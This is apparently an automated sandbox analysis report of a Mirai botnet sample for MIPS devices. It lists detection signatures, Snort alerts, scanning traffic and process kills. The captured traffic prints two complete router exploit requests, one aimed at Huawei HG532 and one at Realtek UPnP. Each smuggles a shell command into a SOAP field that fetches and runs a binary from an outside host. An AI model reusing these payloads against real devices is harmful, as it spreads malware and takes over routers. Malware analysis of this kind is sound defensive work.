Linux Analysis Report KHSQ48GkGn

Overview

General Information

Sample Name: KHSQ48GkGn
Analysis ID: 513296
MD5: 905f7222e4cc69941935cdef4fa16246
SHA1: 84210b6c2c580b67c433e56c0d41831ce17bdd74
SHA256: cd091f9f91f748395e30fa49ed2c4fc9e68247d5e9ae08982d5a2fb3ed074280
Tags: 32, elf, mips, mirai

Detection

Mirai
Score: 76
Range: 0 - 100
Whitelisted: false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Uses known network protocols on non-standard ports
Sample tries to kill many processes (SIGKILL)
Connects to many ports of the same IP (likely port scanning)
Sample has stripped symbol table
HTTP GET or POST without a user agent
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)

Analysis Advice

Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures
None of the HTTP servers contacted by the sample answer. The sample is likely an old dropper which no longer works
Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 513296
Start date: 02.11.2021
Start time: 01:50:54
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 44s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: KHSQ48GkGn
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Detection: MAL
Classification: mal76.spre.troj.lin@0/2@0/0
Warnings:
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100

Process Tree

  • system is lnxubuntu20
  • KHSQ48GkGn (PID: 5238, Parent: 5121, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/KHSQ48GkGn
  • systemd New Fork (PID: 5281, Parent: 1)
  • sshd (PID: 5281, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t
  • systemd New Fork (PID: 5282, Parent: 1)
  • sshd (PID: 5282, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D
  • cleanup

Yara Overview

PCAP (Network Traffic)

Source: dump.pcap
Rule: JoeSecurity_Mirai_12
Description: Yara detected Mirai
Author: Joe Security

    Jbx Signature Overview

    AV Detection:

    Multi AV Scanner detection for submitted file
    Source: KHSQ48GkGn, Virustotal: Detection: 62%
    Source: KHSQ48GkGn, ReversingLabs: Detection: 63%

    Networking:

    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
    Source: TrafficSnort IDS: 716 INFO TELNET access 68.69.24.51:23 -> 192.168.2.23:32972
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49310 -> 45.42.86.91:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49310 -> 45.42.86.91:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37088 -> 45.254.24.198:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37088 -> 45.254.24.198:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43948 -> 185.131.77.190:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43948 -> 185.131.77.190:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43960 -> 185.131.77.190:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33222 -> 45.152.216.146:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33222 -> 45.152.216.146:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:40054 -> 45.33.248.247:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:40054 -> 45.33.248.247:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37098 -> 45.254.24.198:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33234 -> 45.152.216.146:52869
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 103.158.94.100:23 -> 192.168.2.23:54780
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 103.158.94.100:23 -> 192.168.2.23:54780
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 43.231.54.60:23 -> 192.168.2.23:37282
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 43.231.54.60:23 -> 192.168.2.23:37282
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 61.228.109.130:23 -> 192.168.2.23:40428
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 61.228.109.130:23 -> 192.168.2.23:40428
    Source: TrafficSnort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51852
    Source: TrafficSnort IDS: 716 INFO TELNET access 186.236.57.72:23 -> 192.168.2.23:51886
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33028 -> 45.43.233.236:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33028 -> 45.43.233.236:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54250 -> 185.37.99.247:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54250 -> 185.37.99.247:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54256 -> 185.37.99.247:52869
    Source: TrafficSnort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49392 -> 45.41.82.254:52869
    Source: TrafficSnort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49392 -> 45.41.82.254:52869
    Source: TrafficSnort IDS: 716 INFO TELNET access 68.69.24.51:23 -> 192.168.2.23:33104
    Source: TrafficSnort IDS: 1251 INFO TELNET Bad Login 43.231.54.60:23 -> 192.168.2.23:37422
    Source: TrafficSnort IDS: 718 INFO TELNET login incorrect 43.231.54.60:23 -> 192.168.2.23:37422
    Uses known network protocols on non-standard ports
    Source: unknownNetwork traffic detected: HTTP traffic on port 46570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45032 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58138 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57052 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43210 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42650 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35314 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48154 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39108 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53854 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39108 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48110 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39108 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57052 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47384 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47382 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48154 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42492 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39108 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40722 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42492 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53854 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52230 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53236 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42492 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59916 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59598 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57052 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59598 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39102 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39108 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48154 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49310 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59598 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34466 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42492 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43960 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33222 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40054 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37098 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43960 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34330 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58138 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46694 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43960 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33222 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37098 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46694 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 33666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33222 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43960 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37098 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59598 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33582 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35802 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36808 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46694 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54178 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54176 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33222 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43960 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34192 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33234 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37088 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38914 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43018 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37098 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60810 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33028 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46694 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54250 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54256 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43018 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54250 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54256 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42492 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33028 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49010 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54250 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43018 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54256 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 52869
    Connects to many ports of the same IP (likely port scanning)
    Source: global traffic, TCP traffic: 91.254.99.65 ports 2,5,6,8,9,52869
    Source: global traffic, TCP traffic: 91.186.147.224 ports 2,5,6,8,9,52869
    Source: global traffic, TCP traffic: 91.21.105.249 ports 2,5,6,8,9,52869
    Source: global traffic, TCP traffic: 185.174.174.71 ports 2,5,6,8,9,52869
    Source: global traffic, HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
    Content-Length: 430
    Connection: keep-alive
    Accept: */*
    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.36.13.125:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.132.20.237:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.254.171.220:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.96.30.41:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.112.22.104:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.140.127.28:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.221.12.122:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.118.100.2:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.160.25.79:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.90.237.204:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.134.169.75:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.110.200.124:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.235.41.231:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.115.212.153:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.162.78.28:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.175.167.13:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.155.187.216:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.180.82.98:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.110.133.204:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.134.4.195:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.245.38.93:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.204.116.3:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.46.196.164:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.39.251.56:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.130.0.101:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.69.47.98:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 41.77.144.200:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 197.184.164.4:37215
    Source: global trafficTCP traffic: 192.168.2.23:18040 -> 156.58.184.3:37215
    Source: global traffic TCP traffic: 192.168.2.23:41604 -> 37.0.9.202:45
    Source: /tmp/KHSQ48GkGn (PID: 5240) Socket: 0.0.0.0::22
    Source: /tmp/KHSQ48GkGn (PID: 5240) Socket: 0.0.0.0::23
    Source: /tmp/KHSQ48GkGn (PID: 5240) Socket: 0.0.0.0::53413
    Source: /tmp/KHSQ48GkGn (PID: 5240) Socket: 0.0.0.0::80
    Source: /tmp/KHSQ48GkGn (PID: 5240) Socket: 0.0.0.0::52869
    Source: /tmp/KHSQ48GkGn (PID: 5240) Socket: 0.0.0.0::37215
    Source: /tmp/KHSQ48GkGn (PID: 5246) Socket: 0.0.0.0::0
    Source: /tmp/KHSQ48GkGn (PID: 5246) Socket: 0.0.0.0::23
    Source: /tmp/KHSQ48GkGn (PID: 5246) Socket: 0.0.0.0::53413
    Source: /tmp/KHSQ48GkGn (PID: 5246) Socket: 0.0.0.0::80
    Source: /tmp/KHSQ48GkGn (PID: 5246) Socket: 0.0.0.0::52869
    Source: /tmp/KHSQ48GkGn (PID: 5246) Socket: 0.0.0.0::37215
    Source: /usr/sbin/sshd (PID: 5282) Socket: [::]::22
    Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
    Source: KHSQ48GkGn, 5238.1.00000000114beee1.000000004c983291.r-x.sdmp String found in binary or memory: http://37.0.9.202/bins/Hilix.mips
    Source: KHSQ48GkGn, 5238.1.00000000114beee1.000000004c983291.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: KHSQ48GkGn, 5238.1.00000000114beee1.000000004c983291.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
    Source: unknown HTTP traffic detected:
    POST /picdesc.xml HTTP/1.1
    Host: 127.0.0.1:52869
    Content-Length: 630
    Accept-Encoding: gzip, deflate
    SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Connection: keep-alive
    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://37.0.9.202/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></

    System Summary:

    Sample tries to kill many processes (SIGKILL)
    Source: /tmp/KHSQ48GkGn (PID: 5246) SIGKILL sent: pid: 936, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246) SIGKILL sent: pid: 5240, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246) SIGKILL sent: pid: 720, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246) SIGKILL sent: pid: 759, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246) SIGKILL sent: pid: 788, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246) SIGKILL sent: pid: 800, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246) SIGKILL sent: pid: 847, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246) SIGKILL sent: pid: 884, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246) SIGKILL sent: pid: 1334, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246) SIGKILL sent: pid: 1335, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246) SIGKILL sent: pid: 1860, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246) SIGKILL sent: pid: 1872, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246) SIGKILL sent: pid: 2096, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246) SIGKILL sent: pid: 2097, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246) SIGKILL sent: pid: 2102, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246) SIGKILL sent: pid: 2180, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246) SIGKILL sent: pid: 2191, result: successful
    Source: /tmp/KHSQ48GkGn (PID: 5246) SIGKILL sent: pid: 2208, result: successful
    Source: ELF static info symbol of initial sample .symtab present: no
    Source: classification engine Classification label: mal76.spre.troj.lin@0/2@0/0
    Source: KHSQ48GkGn Joe Sandbox Cloud Basic: Detection: clean Score: 0

    Hooking and other Techniques for Hiding and Protection:

    Uses known network protocols on non-standard ports
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56652 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52928 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52918 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49010 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34192 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44938 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59666 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50650 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 56678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38710 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38714 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34192 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35314 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42650 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42490 -> 52869
